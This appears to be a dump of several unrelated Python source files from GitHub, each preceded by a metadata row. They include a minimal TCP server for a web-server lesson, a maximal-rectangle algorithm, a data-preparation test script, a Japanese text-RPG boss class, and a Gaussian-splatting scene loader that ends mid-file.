| nautobot/nautobot-plugin-golden-config | nautobot_golden_config/models.py | models.py | py | 27,885 | python | en | code | 91 | github-code | 36 |
41613286837 | import socket
if __name__ == '__main__':
# 创建TCP套接字
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 设置套接字选项
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 绑定 监听
server_socket.bind(('',8080))
server_socket.listen(128)
while True:
client_socket, client_addr = server_socket.accept()
print("接受到来自%s的连接请求" % str(client_addr))
recv_data = client_socket.recv(4096)
if not recv_data:
print("对方已经断开连接")
else:
print(recv_data)
client_socket.close() | ABDM357/python_summary_knowledge_001 | Day01-15 Python基础课程/Day01-15课程与项目/07 [项目]web服务器:自己动手实现web服务器/03-代码/00-模拟web服务器接收浏览器的HTTP请求.py | 00-模拟web服务器接收浏览器的HTTP请求.py | py | 661 | python | en | code | 0 | github-code | 36 |
33831041355 | def nextSmaller(arr):
# result array
res = [-1] * len(arr)
# stak
stack = []
# traversing from end
for i in range(len(arr)-1, -1, -1):
# current element
curr = arr[i]
# keep popping element from stack untill you're getting a bigger element
while len(stack) and arr[stack[-1]] >= curr:
stack.pop()
# we got the smaller element, store it as answer
if len(stack):
res[i] = stack[-1]
else:
res[i] = len(arr)
# add the current number
stack.append(i)
# print(res)
return res
def prevSmaller(arr):
st = []
res = [-1] * len(arr)
for i in range(len(arr)):
curr = arr[i]
while len(st) and arr[st[-1]] >= curr:
st.pop()
if len(st):
res[i] = st[-1]
else:
res[i] = -1
st.append(i)
# print(res)
return res
def maxAreaHistogram(arr):
ns = nextSmaller(arr)
ps = prevSmaller(arr)
area = 0
for i in range(len(arr)):
area = max((ns[i] - ps[i] - 1) * arr[i], area)
# print(area)
return area
def maxAreaMatrix(arr):
tempArr = [0] * len(arr)
area = 0
for i in range(len(arr)):
for j in range(len(arr[i])):
if arr[i][j]:
tempArr[j] += arr[i][j]
else:
tempArr[j] = 0
print(tempArr)
area = max(area, maxAreaHistogram(tempArr))
print(area)
l = [[0, 1, 1, 0], [1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 0, 0]]
maxAreaMatrix(l)
| Rohit-2412/DSA | Array/maxAreaRectangle.py | maxAreaRectangle.py | py | 1,577 | python | en | code | 2 | github-code | 36 |
74436410985 | # -*- coding: utf-8 -*-
# Data preparation at one-second level for Ph.D thesis
# @author: Andres L. Suarez-Cetrulo
import glob
import time
import logging
import yaml
import subprocess
import os
import pandas as pd
import numpy as np
import datetime
# Global attributes
SLASH = os.path.sep
EQUIVALENCE = {
's': 1,
'min': 60
}
# logging.getLogger().addHandler(logging.StreamHandler()) # for debugging while coding / comment out otherwise
LOGLEVEL = logging.DEBUG # logging.WARNING # logging.DEBUG
def get_datetime_format(date):
return time.strptime(date, "%Y-%m-%d")
def show_missing_values(dates, df_name, df):
logging.debug('Printing list of dates with missing values in ' + df_name + ' level (e.g. NA and nulls).')
logging.debug(str(np.unique(dates.index.time)))
logging.debug('Showing full DF for only rows with missing values in ' + df_name + ' level')
logging.debug(df[df.isnull().any(axis=1)].to_string())
logging.debug('Returning the list of columns which have missing values in ' + df_name + ' level')
nulls = list()
for col, bool_var in df.isna().any().items():
if bool_var:
nulls.append(col)
logging.debug(df.isna().any().keys())
def set_logging(config):
# Set logging level
logname = str(config['efts']).replace('\'','') + ' Tests across files starting with ' + config['levels'][0] + \
' level and period (' + config['start'] + '-' + config['end'] + ').log'
logging.basicConfig(filename=config['path'] + logname)
logger = logging.getLogger()
logger.setLevel(LOGLEVEL)
logging.info('')
def log_new_execution(config):
logging.info('')
logging.info('')
logging.info('')
logging.info('')
logging.info('')
logging.info('#########################')
logging.info('')
logging.info('')
logging.info('NEW EXECUTION AT: '+str(datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')))
logging.info('')
logging.info('')
logging.info('#########################')
logging.info('Logging config settings:')
logging.info(config)
def log_iteration(config):
logging.info(' -------------------------------------------------------------- ')
logging.info(' START OF TEST FOR ' + str(config['eft']).replace('\'','') +
' ' + config['level'] + ' level on period: ' +
config['start'] + ' to ' + config['end'])
logging.info(' -------------------------------------------------------------- ')
def load_config():
# Load global parameters as paths, symbols and periods to iterate through
with open(os.path.sep.join(['.', 'config.yaml']), 'r') as f:
config = yaml.safe_load(f.read())['merging']
# Path where every individual folder is located
config['path'] = config['src_path'] # + config['level'] + '-level' + SLASH + config['eft'] + SLASH
config['filename_pattern'] = config['eft'] + '_*_indicators.csv.gz'
config['start_date'] = get_datetime_format(config['start'])
config['end_date'] = get_datetime_format(config['end'])
config['end_date'] = get_datetime_format(config['end'])
config['name'] = '_'.join([config['eft'], config['output_subname'], config['level']])+'-level'
config['output'] = config['path'] + config['name']
# The feature set in 15min and 30min levels differ to avoid considering dependencies across days
config['featureset'] = config['columns'+nconf['level']] if config['level'] in ['15min', '30min'] \
else config['columns']
return config
def new_config(nconf):
""" Only use this for testing and not creating of .arff, as we add the field gapt+1 to the featureset"""
# Path where every individual folder is located
nconf['path'] = nconf['src_path'] + nconf['level'] + '-level' + SLASH + nconf['eft'] + SLASH
nconf['filename_pattern'] = nconf['eft'] + '_*_indicators.csv.gz'
nconf['start_date'] = get_datetime_format(nconf['start'])
nconf['end_date'] = get_datetime_format(nconf['end'])
nconf['name'] = '_'.join([nconf['eft'], nconf['output_subname'], nconf['level']])+'-level'
nconf['output'] = nconf['path'] + nconf['name']
# The feature set in 15min and 30min levels differ to avoid considering dependencies across days
nconf['featureset'] = nconf['columns'+nconf['level']] if nconf['level'] in ['15min', '30min'] \
else nconf['columns']
if 'gap_t+1' not in nconf['featureset']:
nconf['featureset'].append('gap_t+1')
return nconf
def load_data(conf, min_time=''):
# Iterate through collection of processed data with indicators
df_full = pd.DataFrame()
for filename in sorted(glob.glob(conf['path'] + conf['filename_pattern'])):
# Extract dates from filename
aux_dates = filename.replace(conf['path'] + conf['eft']+'_(', '')
aux_dates = aux_dates.replace(')_indicators.csv.gz', '')
dates = aux_dates.split('_to_')
# If file in date range, add it to DF
if get_datetime_format(dates[0]) >= conf['start_date'] and \
get_datetime_format(dates[1]) <= conf['end_date']:
logging.info('Importing data period ' + str(dates[0]) + ' to ' + str(dates[1]) + '.')
new_df = pd.read_csv(filename, encoding="utf-8", index_col=0, sep=";")
new_df['datetime'] = new_df.index # save string readable timestamp as a column
new_df.index = pd.to_datetime(new_df.index)
print('Preview of 5 fist rows of file being load.')
print(new_df.head(5))
# If required, remove times if there are dependencies from previous days,
# or missing values in certain dates that we should avoid
if min_time == '':
print('Rows removed at this level: '+str(conf['rows_per_day_to_remove'][str(conf['level'])]))
print(conf['rows_per_day_to_remove'][str(conf['level'])])
min_time = '09:30' if int(conf['rows_per_day_to_remove'][str(conf['level'])]) == 0 \
else get_min_time(conf, new_df)
print('Current minimum time being considered: '+str(min_time))
new_df = new_df.between_time(min_time, '16:00')
df_full = df_full.append(new_df)
# logging.debug('Printing a sample of DF at level: '+conf['level'])
# logging.debug(df)
logging.info('Data read.')
logging.warning('WARNING: Now make sure that the count of rows makes sense for the number of market days:')
logging.warning(df_full.groupby([df_full.index.year, df_full.index.month, df_full.index.day]).agg({'count'}).to_string())
return df_full[conf['featureset']], min_time
def get_min_time(conf, df):
# Return the time of the minimum datetime
return min(df[int(conf['rows_per_day_to_remove'][str(conf['level'])]):].index.tolist()).time()
def split_level(txt, seps): # this function would make sense if we had tick, hourly or daily level also.
default_sep = seps[0]
# we skip seps[0] because that's the default separator
level = ''
for sep in seps[1:]:
aux_len = len(txt)
txt = txt.replace(sep, default_sep)
level = sep if len(txt) != aux_len else level # if it has changed, then we keep the level string
level_split = [i.strip() for i in txt.split(default_sep)]
level_split[1] = default_sep if level == '' else level
return level_split
def plot_stats(cl_df, ol_df, scl, sol):
logging.info('Iterated level DF has a length of: '+str(len(ol_df))+' versus a length of: '+str(len(cl_df)) +
'. The equivalence should be of: cdf = '+str(float(scl)/float(sol))+'*odf')
logging.info('Current DF cdf stats: '+cl_df.describe().to_string())
logging.info('Compared DF odf stats: '+ol_df.describe().to_string())
def test_subsets(df1, df2):
# checking that datetime for the current level exists in inferior levels
key_diff = set(df1.index).difference(df2.index)
where_diff = df1.index.isin(key_diff)
logging.info('Logging difference:')
logging.info(df1[where_diff])
assert len(df1[where_diff]) == 0
logging.debug('Test 2 PASSED: No missing subsets (rows based on datetime) when looking at lower levels.')
def test_number_of_rows(cl_df, ol_df, comparison_type, scl, sol):
if comparison_type == 'eft':
cl_df.index = pd.to_datetime(cl_df.index)
logging.debug(len(np.unique(cl_df.index.date)))
len_cdf = len(cl_df)
len_odf = len(ol_df)
logging.debug('Size of c_eft: '+str(len_cdf))
logging.debug(cl_df.head())
logging.debug('Size of o_eft: '+str(len_odf))
logging.debug(ol_df.head())
cl_df['datetime'] = cl_df.index
print(cl_df[cl_df['datetime'] == '2015-04-01 09:41:15'])
test = len_cdf == len_odf
logging.info('')
logging.info('Test 0: Length of both EFTs have the same length for the same periods and level: ' +
' PASSED' if test else ' NOT PASSED')
logging.info('')
test_subsets(ol_df, cl_df)
assert test
else:
# Test not ready. It only works for single dates.
from collections import Counter
cl_df['stridx'] = cl_df.index
ol_df['stridx'] = ol_df.index
logging.info(pd.Series(cl_df['stridx'].str.split(' ')[0].map(Counter).sum()))
logging.info(len(cl_df[cl_df['stridx'].str.contains('2015-01-02')]))
logging.info(len(ol_df[ol_df['stridx'].str.contains('2015-01-02')]))
logging.infologging.info(len(cl_df.loc['2015-01-02' in cl_df.index]))
logging.info(len(ol_df.loc['2015-01-02' in ol_df.index]))
logging.info('---')
logging.info(len_cdf * (float(scl)/float(sol)) * len(np.unique(cl_df.index.date)) - (float(scl)/float(sol) * len(np.unique(cl_df.index.date))) + len(np.unique(cl_df.index.date)))
## for a single day
logging.infologging.info(len_cdf * float(scl)/float(sol) - float(scl)/float(sol) + 1)
logging.info(len_odf * sol)
# for a single day
#assert len_cdf * float(scl)/float(sol) - float(scl)/float(sol) + 1 == len_odf * sol
def max_and_min_dates(cl_df, ol_df):
cl_df['datetime'] = pd.to_datetime(cl_df.index)
ol_df['datetime'] = pd.to_datetime(ol_df.index)
logging.info('Max and min dates in current DF are: ' +
str(cl_df['datetime'].min())+' - '+str(cl_df['datetime'].max()))
logging.info('Max and min dates in compared DF are: ' +
str(ol_df['datetime'].min())+' - '+str(ol_df['datetime'].max()))
def any_nulls(cl_df, ol_df):
# Exclude last row from comparisons as it may be null for lack of values after 4pm
cl_df.drop(cl_df.tail(1).index, inplace=True) # drop last n rows
ol_df.drop(ol_df.tail(1).index, inplace=True) # drop last n rows
logging.info('Confirming that both currend compared models don\'t have missing values:')
passed = (len(cl_df[cl_df.isnull().any(axis=1)]) == 0 and len(ol_df[ol_df.isnull().any(axis=1)]) == 0)
logging.info(('PASSED' if passed else 'NOT PASSED'))
if ~passed:
aux_df = cl_df[cl_df.isnull().any(axis=1)]
aux_df.index = pd.to_datetime(aux_df.index)
show_missing_values(dates=aux_df, df_name='current', df=cl_df)
aux_df = ol_df[ol_df.isnull().any(axis=1)]
aux_df.index = pd.to_datetime(aux_df.index)
show_missing_values(dates=aux_df, df_name='compared', df=ol_df)
assert passed
def get_percentage_of_gaps(cl_df, ol_df):
logging.debug('--------------------------------------------')
logging.debug('Printing percentage of gaps in current level')
logging.info(len(cl_df[cl_df['gap_t+1'] == 1])/len(cl_df))
logging.debug('Printing percentage of gaps in compared level')
logging.info(len(ol_df[ol_df['gap_t+1'] == 1])/len(ol_df))
logging.debug('')
logging.warning('Are the two values above similar enough when compared to the previous testing logs? Manual check.')
logging.debug('--------------------------------------------')
def compare_levels(cl_df, ol_df, c_level, o_level, featureset):
logging.info('')
logging.info('#################################')
logging.info('')
logging.info('o_level: '+str(o_level))
logging.info('c_level: '+str(c_level))
logging.info('')
# second equivalence of current level and the other level to compare against in the current iteration
scl = int(c_level[0]) * EQUIVALENCE[c_level[1]]
sol = int(o_level[0]) * EQUIVALENCE[o_level[1]]
# First unit test
logging.info('Test 1: Stats and counts - Judge manually below to determine if it PASSED. Different number of ' +
'columns across levels it\'s ok, as it is a design-made choice.')
logging.info('Please, check that the difference in amount of rows for the same date period makes sense.')
logging.info('For a single date, this should be truth: ' +
'len_current_df * float(scl)/float(sol) - float(scl)/float(sol) + 1 == len_compared_df * sol')
logging.info('scl and sol are the amount of seconds of the current and compared level respectively. '+
'If current_df level =30 min level, then scl=30*60.')
plot_stats(cl_df, ol_df, scl, sol)
# if the other level to compare against is lower than the current one, trigger the following tests
# added extra checks just in case
if sol < scl and int(c_level[0]) % int(o_level[0]) == 0 and c_level[1] == o_level[1]:
logging.info('Test 2: Check if lower levels miss any row that they shouldn\'t')
test_subsets(cl_df, ol_df)
logging.info('Test 3: Max and Min dates:')
max_and_min_dates(cl_df, ol_df)
logging.info('Test 4: Any null values?')
any_nulls(cl_df[featureset], cl_df[featureset])
logging.info('Test 5: Percentage of gaps. ' +
'It should map the percentages that we already have in the same files ' +
'regarding to the class distribution.')
get_percentage_of_gaps(cl_df, ol_df)
def compare_efts(ce_df, oe_df, c_eft, o_eft):
logging.info('')
logging.info('#################################')
logging.info('')
logging.info('o_eft: '+str(o_eft))
logging.info('c_eft: '+str(c_eft))
logging.info('')
logging.info('Test 0: Stats and counts - Judge manually below to determined if it PASSED. ' +
'IBEX may be the most different one due to bank holidays in Spain.')
test_number_of_rows(ce_df, oe_df, 'eft', 1, 1)
def run_tests_for_config(config):
# Load all the data for the current level and period in a Dataframe
cl_df, min_time = load_data(config)
logging.info('First part in testing, comparing to efts at same level:')
for other_eft in config['compare_efts']:
logging.info(' ///// ')
logging.info('Comparing to efts: '+other_eft)
# Load DF to compare against
oe_config = config.copy()
oe_config['eft'] = other_eft
oe_df, _ = load_data(new_config(oe_config)) # only getting DF, as min_time doesn't need to update
compare_efts(cl_df, oe_df, config['eft'], oe_config['eft'])
logging.info(' ///// ')
logging.info('Second part in testing, comparing different levels of the same EFT and period:')
c_level = split_level(config['level'], list(EQUIVALENCE.keys()))
for other_level in config['compare_against']:
logging.info(' ///// ')
logging.info('Comparing to level: '+other_level)
# Load DF to compare against
ol_config = config.copy()
ol_config['level'] = other_level
# new_config updates some config settings that are dependant on the values changed
ol_df, _ = load_data(new_config(ol_config), min_time) # only getting DF, as min_time doesn't need to update
# Tests
o_level = split_level(other_level, list(EQUIVALENCE.keys()))
compare_levels(cl_df, ol_df, c_level, o_level, config['featureset'])
logging.info(' ///// ')
def run_tests():
# Load settings and set logging config
config = load_config()
config['featureset'].append('gap_t+1') # only for testing (not merging)
set_logging(config)
log_new_execution(config)
for eft in config['efts']:
print()
print('EFT: '+str(eft))
print('------')
for period in config['periods'].values():
print('')
print('Period: '+str(period))
print('')
for level in config['levels']:
print('Level: '+str(level))
config['eft'] = eft
config['start'] = period[0]
config['end'] = period[1]
config['level'] = level
log_iteration(config)
run_tests_for_config(new_config(config))
if __name__ == '__main__':
run_tests()
| cetrulin/Quant-Quote-Data-Preprocessing | src/2_testing.py | 2_testing.py | py | 16,897 | python | en | code | 0 | github-code | 36 |
24850285371 | from character import Enemy
from battle import Battle
from system import display_message
class LastCastle:
def __init__(self, player):
self.player = player
self.enemy = Enemy()
self.enemy.define_enemy("last_boss", self.player.stats["level"])
self.battle = Battle(self.player, self.enemy)
def boss_lines(self):
display_message('魔王:「良くぞここまでたどり着いた、勇者よ。誉めてやろう。」')
display_message('%s:「だろ?そして、俺はお前を倒す!」' % (self.player.stats['name']))
display_message('魔王:「ほう。面白い。出来るものならやってみせよ!」')
def encounter(self):
display_message("%sが現れた!" % (self.enemy.stats["name"]))
self.battle.start_battle()
def travel(self):
display_message("~魔王城~")
self.boss_lines()
self.encounter()
| shimeji3207/projects | textrpg/last_castle.py | last_castle.py | py | 941 | python | ja | code | 0 | github-code | 36 |
36992033529 | import os
import sys
from PIL import Image
from scene.cameras import Camera
from typing import NamedTuple
from scene.colmap_loader import read_extrinsics_text, read_intrinsics_text, qvec2rotmat, \
read_extrinsics_binary, read_intrinsics_binary, read_points3D_binary, read_points3D_text
from scene.hyper_loader import Load_hyper_data, format_hyper_data
import torchvision.transforms as transforms
import copy
from utils.graphics_utils import getWorld2View2, focal2fov, fov2focal
import numpy as np
import torch
import json
from pathlib import Path
from plyfile import PlyData, PlyElement
from utils.sh_utils import SH2RGB
from scene.gaussian_model import BasicPointCloud
from utils.general_utils import PILtoTorch
from tqdm import tqdm
class CameraInfo(NamedTuple):
uid: int
R: np.array
T: np.array
FovY: np.array
FovX: np.array
image: np.array
image_path: str
image_name: str
width: int
height: int
time : float
mask: np.array
class SceneInfo(NamedTuple):
point_cloud: BasicPointCloud
train_cameras: list
test_cameras: list
video_cameras: list
nerf_normalization: dict
ply_path: str
maxtime: int
def getNerfppNorm(cam_info):
def get_center_and_diag(cam_centers):
cam_centers = np.hstack(cam_centers)
avg_cam_center = np.mean(cam_centers, axis=1, keepdims=True)
center = avg_cam_center
dist = np.linalg.norm(cam_centers - center, axis=0, keepdims=True)
diagonal = np.max(dist)
return center.flatten(), diagonal
cam_centers = []
for cam in cam_info:
W2C = getWorld2View2(cam.R, cam.T)
C2W = np.linalg.inv(W2C)
cam_centers.append(C2W[:3, 3:4])
center, diagonal = get_center_and_diag(cam_centers)
radius = diagonal * 1.1
translate = -center
# breakpoint()
return {"translate": translate, "radius": radius}
def readColmapCameras(cam_extrinsics, cam_intrinsics, images_folder):
cam_infos = []
for idx, key in enumerate(cam_extrinsics):
sys.stdout.write('\r')
# the exact output you're looking for:
sys.stdout.write("Reading camera {}/{}".format(idx+1, len(cam_extrinsics)))
sys.stdout.flush()
extr = cam_extrinsics[key]
intr = cam_intrinsics[extr.camera_id]
height = intr.height
width = intr.width
uid = intr.id
R = np.transpose(qvec2rotmat(extr.qvec))
T = np.array(extr.tvec)
if intr.model in ["SIMPLE_PINHOLE", "SIMPLE_RADIAL"]:
focal_length_x = intr.params[0]
FovY = focal2fov(focal_length_x, height)
FovX = focal2fov(focal_length_x, width)
elif intr.model=="PINHOLE":
focal_length_x = intr.params[0]
focal_length_y = intr.params[1]
FovY = focal2fov(focal_length_y, height)
FovX = focal2fov(focal_length_x, width)
elif intr.model == "OPENCV":
focal_length_x = intr.params[0]
focal_length_y = intr.params[1]
FovY = focal2fov(focal_length_y, height)
FovX = focal2fov(focal_length_x, width)
else:
assert False, "Colmap camera model not handled: only undistorted datasets (PINHOLE or SIMPLE_PINHOLE cameras) supported!"
image_path = os.path.join(images_folder, os.path.basename(extr.name))
image_name = os.path.basename(image_path).split(".")[0]
image = Image.open(image_path)
image = PILtoTorch(image,None)
cam_info = CameraInfo(uid=uid, R=R, T=T, FovY=FovY, FovX=FovX, image=image,
image_path=image_path, image_name=image_name, width=width, height=height,
time = 0, mask=None)
cam_infos.append(cam_info)
sys.stdout.write('\n')
return cam_infos
def fetchPly(path):
plydata = PlyData.read(path)
vertices = plydata['vertex']
positions = np.vstack([vertices['x'], vertices['y'], vertices['z']]).T
colors = np.vstack([vertices['red'], vertices['green'], vertices['blue']]).T / 255.0
normals = np.vstack([vertices['nx'], vertices['ny'], vertices['nz']]).T
return BasicPointCloud(points=positions, colors=colors, normals=normals)
def storePly(path, xyz, rgb):
# Define the dtype for the structured array
dtype = [('x', 'f4'), ('y', 'f4'), ('z', 'f4'),
('nx', 'f4'), ('ny', 'f4'), ('nz', 'f4'),
('red', 'f4'), ('green', 'f4'), ('blue', 'f4')]
normals = np.zeros_like(xyz)
elements = np.empty(xyz.shape[0], dtype=dtype)
# breakpoint()
attributes = np.concatenate((xyz, normals, rgb), axis=1)
elements[:] = list(map(tuple, attributes))
# Create the PlyData object and write to file
vertex_element = PlyElement.describe(elements, 'vertex')
ply_data = PlyData([vertex_element])
ply_data.write(path)
def readColmapSceneInfo(path, images, eval, llffhold=8):
try:
cameras_extrinsic_file = os.path.join(path, "sparse/0", "images.bin")
cameras_intrinsic_file = os.path.join(path, "sparse/0", "cameras.bin")
cam_extrinsics = read_extrinsics_binary(cameras_extrinsic_file)
cam_intrinsics = read_intrinsics_binary(cameras_intrinsic_file)
except:
cameras_extrinsic_file = os.path.join(path, "sparse/0", "images.txt")
cameras_intrinsic_file = os.path.join(path, "sparse/0", "cameras.txt")
cam_extrinsics = read_extrinsics_text(cameras_extrinsic_file)
cam_intrinsics = read_intrinsics_text(cameras_intrinsic_file)
reading_dir = "images" if images == None else images
cam_infos_unsorted = readColmapCameras(cam_extrinsics=cam_extrinsics, cam_intrinsics=cam_intrinsics, images_folder=os.path.join(path, reading_dir))
cam_infos = sorted(cam_infos_unsorted.copy(), key = lambda x : x.image_name)
# breakpoint()
if eval:
train_cam_infos = [c for idx, c in enumerate(cam_infos) if idx % llffhold != 0]
test_cam_infos = [c for idx, c in enumerate(cam_infos) if idx % llffhold == 0]
else:
train_cam_infos = cam_infos
test_cam_infos = []
nerf_normalization = getNerfppNorm(train_cam_infos)
ply_path = os.path.join(path, "sparse/0/points3D.ply")
bin_path = os.path.join(path, "sparse/0/points3D.bin")
txt_path = os.path.join(path, "sparse/0/points3D.txt")
if not os.path.exists(ply_path):
print("Converting point3d.bin to .ply, will happen only the first time you open the scene.")
try:
xyz, rgb, _ = read_points3D_binary(bin_path)
except:
xyz, rgb, _ = read_points3D_text(txt_path)
storePly(ply_path, xyz, rgb)
try:
pcd = fetchPly(ply_path)
except:
pcd = None
scene_info = SceneInfo(point_cloud=pcd,
train_cameras=train_cam_infos,
test_cameras=test_cam_infos,
video_cameras=train_cam_infos,
maxtime=0,
nerf_normalization=nerf_normalization,
ply_path=ply_path)
return scene_info
def generateCamerasFromTransforms(path, template_transformsfile, extension, maxtime):
trans_t = lambda t : torch.Tensor([
[1,0,0,0],
[0,1,0,0],
[0,0,1,t],
[0,0,0,1]]).float()
rot_phi = lambda phi : torch.Tensor([
[1,0,0,0],
[0,np.cos(phi),-np.sin(phi),0],
[0,np.sin(phi), np.cos(phi),0],
[0,0,0,1]]).float()
rot_theta = lambda th : torch.Tensor([
[np.cos(th),0,-np.sin(th),0],
[0,1,0,0],
[np.sin(th),0, np.cos(th),0],
[0,0,0,1]]).float()
def pose_spherical(theta, phi, radius):
c2w = trans_t(radius)
c2w = rot_phi(phi/180.*np.pi) @ c2w
c2w = rot_theta(theta/180.*np.pi) @ c2w
c2w = torch.Tensor(np.array([[-1,0,0,0],[0,0,1,0],[0,1,0,0],[0,0,0,1]])) @ c2w
return c2w
cam_infos = []
# generate render poses and times
render_poses = torch.stack([pose_spherical(angle, -30.0, 4.0) for angle in np.linspace(-180,180,160+1)[:-1]], 0)
render_times = torch.linspace(0,maxtime,render_poses.shape[0])
with open(os.path.join(path, template_transformsfile)) as json_file:
template_json = json.load(json_file)
try:
fovx = template_json["camera_angle_x"]
except:
fovx = focal2fov(template_json["fl_x"], template_json['w'])
print("hello!!!!")
# breakpoint()
# load a single image to get image info.
for idx, frame in enumerate(template_json["frames"]):
cam_name = os.path.join(path, frame["file_path"] + extension)
image_path = os.path.join(path, cam_name)
image_name = Path(cam_name).stem
image = Image.open(image_path)
im_data = np.array(image.convert("RGBA"))
image = PILtoTorch(image,(800,800))
break
# format information
for idx, (time, poses) in enumerate(zip(render_times,render_poses)):
time = time/maxtime
matrix = np.linalg.inv(np.array(poses))
R = -np.transpose(matrix[:3,:3])
R[:,0] = -R[:,0]
T = -matrix[:3, 3]
fovy = focal2fov(fov2focal(fovx, image.shape[1]), image.shape[2])
FovY = fovy
FovX = fovx
cam_infos.append(CameraInfo(uid=idx, R=R, T=T, FovY=FovY, FovX=FovX, image=image,
image_path=None, image_name=None, width=image.shape[1], height=image.shape[2],
time = time, mask=None))
return cam_infos
def readCamerasFromTransforms(path, transformsfile, white_background, extension=".png", mapper = {}):
cam_infos = []
with open(os.path.join(path, transformsfile)) as json_file:
contents = json.load(json_file)
try:
fovx = contents["camera_angle_x"]
except:
fovx = focal2fov(contents['fl_x'],contents['w'])
frames = contents["frames"]
for idx, frame in enumerate(frames):
cam_name = os.path.join(path, frame["file_path"] + extension)
time = mapper[frame["time"]]
matrix = np.linalg.inv(np.array(frame["transform_matrix"]))
R = -np.transpose(matrix[:3,:3])
R[:,0] = -R[:,0]
T = -matrix[:3, 3]
image_path = os.path.join(path, cam_name)
image_name = Path(cam_name).stem
image = Image.open(image_path)
im_data = np.array(image.convert("RGBA"))
bg = np.array([1,1,1]) if white_background else np.array([0, 0, 0])
norm_data = im_data / 255.0
arr = norm_data[:,:,:3] * norm_data[:, :, 3:4] + bg * (1 - norm_data[:, :, 3:4])
image = Image.fromarray(np.array(arr*255.0, dtype=np.byte), "RGB")
image = PILtoTorch(image,(800,800))
fovy = focal2fov(fov2focal(fovx, image.shape[1]), image.shape[2])
FovY = fovy
FovX = fovx
cam_infos.append(CameraInfo(uid=idx, R=R, T=T, FovY=FovY, FovX=FovX, image=image,
image_path=image_path, image_name=image_name, width=image.shape[1], height=image.shape[2],
time = time, mask=None))
return cam_infos
def read_timeline(path):
with open(os.path.join(path, "transforms_train.json")) as json_file:
train_json = json.load(json_file)
with open(os.path.join(path, "transforms_test.json")) as json_file:
test_json = json.load(json_file)
time_line = [frame["time"] for frame in train_json["frames"]] + [frame["time"] for frame in test_json["frames"]]
time_line = set(time_line)
time_line = list(time_line)
time_line.sort()
timestamp_mapper = {}
max_time_float = max(time_line)
for index, time in enumerate(time_line):
# timestamp_mapper[time] = index
timestamp_mapper[time] = time/max_time_float
return timestamp_mapper, max_time_float
def readNerfSyntheticInfo(path, white_background, eval, extension=".png"):
timestamp_mapper, max_time = read_timeline(path)
print("Reading Training Transforms")
train_cam_infos = readCamerasFromTransforms(path, "transforms_train.json", white_background, extension, timestamp_mapper)
print("Reading Test Transforms")
test_cam_infos = readCamerasFromTransforms(path, "transforms_test.json", white_background, extension, timestamp_mapper)
print("Generating Video Transforms")
video_cam_infos = generateCamerasFromTransforms(path, "transforms_train.json", extension, max_time)
if not eval:
train_cam_infos.extend(test_cam_infos)
test_cam_infos = []
nerf_normalization = getNerfppNorm(train_cam_infos)
ply_path = os.path.join(path, "fused.ply")
if not os.path.exists(ply_path):
# Since this data set has no colmap data, we start with random points
num_pts = 2000
print(f"Generating random point cloud ({num_pts})...")
# We create random points inside the bounds of the synthetic Blender scenes
xyz = np.random.random((num_pts, 3)) * 2.6 - 1.3
shs = np.random.random((num_pts, 3)) / 255.0
pcd = BasicPointCloud(points=xyz, colors=SH2RGB(shs), normals=np.zeros((num_pts, 3)))
# storePly(ply_path, xyz, SH2RGB(shs) * 255)
else:
pcd = fetchPly(ply_path)
# xyz = -np.array(pcd.points)
# pcd = pcd._replace(points=xyz)
scene_info = SceneInfo(point_cloud=pcd,
train_cameras=train_cam_infos,
test_cameras=test_cam_infos,
video_cameras=video_cam_infos,
nerf_normalization=nerf_normalization,
ply_path=ply_path,
maxtime=max_time
)
return scene_info
def format_infos(dataset,split):
# loading
cameras = []
image = dataset[0][0]
if split == "train":
for idx in tqdm(range(len(dataset))):
image_path = None
image_name = f"{idx}"
time = dataset.image_times[idx]
# matrix = np.linalg.inv(np.array(pose))
R,T = dataset.load_pose(idx)
FovX = focal2fov(dataset.focal[0], image.shape[1])
FovY = focal2fov(dataset.focal[0], image.shape[2])
cameras.append(CameraInfo(uid=idx, R=R, T=T, FovY=FovY, FovX=FovX, image=image,
image_path=image_path, image_name=image_name, width=image.shape[2], height=image.shape[1],
time = time, mask=None))
return cameras
def readHyperDataInfos(datadir,use_bg_points,eval):
train_cam_infos = Load_hyper_data(datadir,0.5,use_bg_points,split ="train")
test_cam_infos = Load_hyper_data(datadir,0.5,use_bg_points,split="test")
print("load finished")
train_cam = format_hyper_data(train_cam_infos,"train")
print("format finished")
max_time = train_cam_infos.max_time
video_cam_infos = copy.deepcopy(test_cam_infos)
video_cam_infos.split="video"
ply_path = os.path.join(datadir, "points3D_downsample.ply")
pcd = fetchPly(ply_path)
xyz = np.array(pcd.points)
pcd = pcd._replace(points=xyz)
nerf_normalization = getNerfppNorm(train_cam)
plot_camera_orientations(train_cam_infos, pcd.points)
scene_info = SceneInfo(point_cloud=pcd,
train_cameras=train_cam_infos,
test_cameras=test_cam_infos,
video_cameras=video_cam_infos,
nerf_normalization=nerf_normalization,
ply_path=ply_path,
maxtime=max_time
)
return scene_info
def format_render_poses(poses,data_infos):
cameras = []
tensor_to_pil = transforms.ToPILImage()
len_poses = len(poses)
times = [i/len_poses for i in range(len_poses)]
image = data_infos[0][0]
for idx, p in tqdm(enumerate(poses)):
# image = None
image_path = None
image_name = f"{idx}"
time = times[idx]
pose = np.eye(4)
pose[:3,:] = p[:3,:]
# matrix = np.linalg.inv(np.array(pose))
R = pose[:3,:3]
R = - R
R[:,0] = -R[:,0]
T = -pose[:3,3].dot(R)
FovX = focal2fov(data_infos.focal[0], image.shape[2])
FovY = focal2fov(data_infos.focal[0], image.shape[1])
cameras.append(CameraInfo(uid=idx, R=R, T=T, FovY=FovY, FovX=FovX, image=image,
image_path=image_path, image_name=image_name, width=image.shape[2], height=image.shape[1],
time = time, mask=None))
return cameras
def add_points(pointsclouds, xyz_min, xyz_max):
add_points = (np.random.random((100000, 3)))* (xyz_max-xyz_min) + xyz_min
add_points = add_points.astype(np.float32)
addcolors = np.random.random((100000, 3)).astype(np.float32)
addnormals = np.random.random((100000, 3)).astype(np.float32)
# breakpoint()
new_points = np.vstack([pointsclouds.points,add_points])
new_colors = np.vstack([pointsclouds.colors,addcolors])
new_normals = np.vstack([pointsclouds.normals,addnormals])
pointsclouds=pointsclouds._replace(points=new_points)
pointsclouds=pointsclouds._replace(colors=new_colors)
pointsclouds=pointsclouds._replace(normals=new_normals)
return pointsclouds
# breakpoint()
# new_
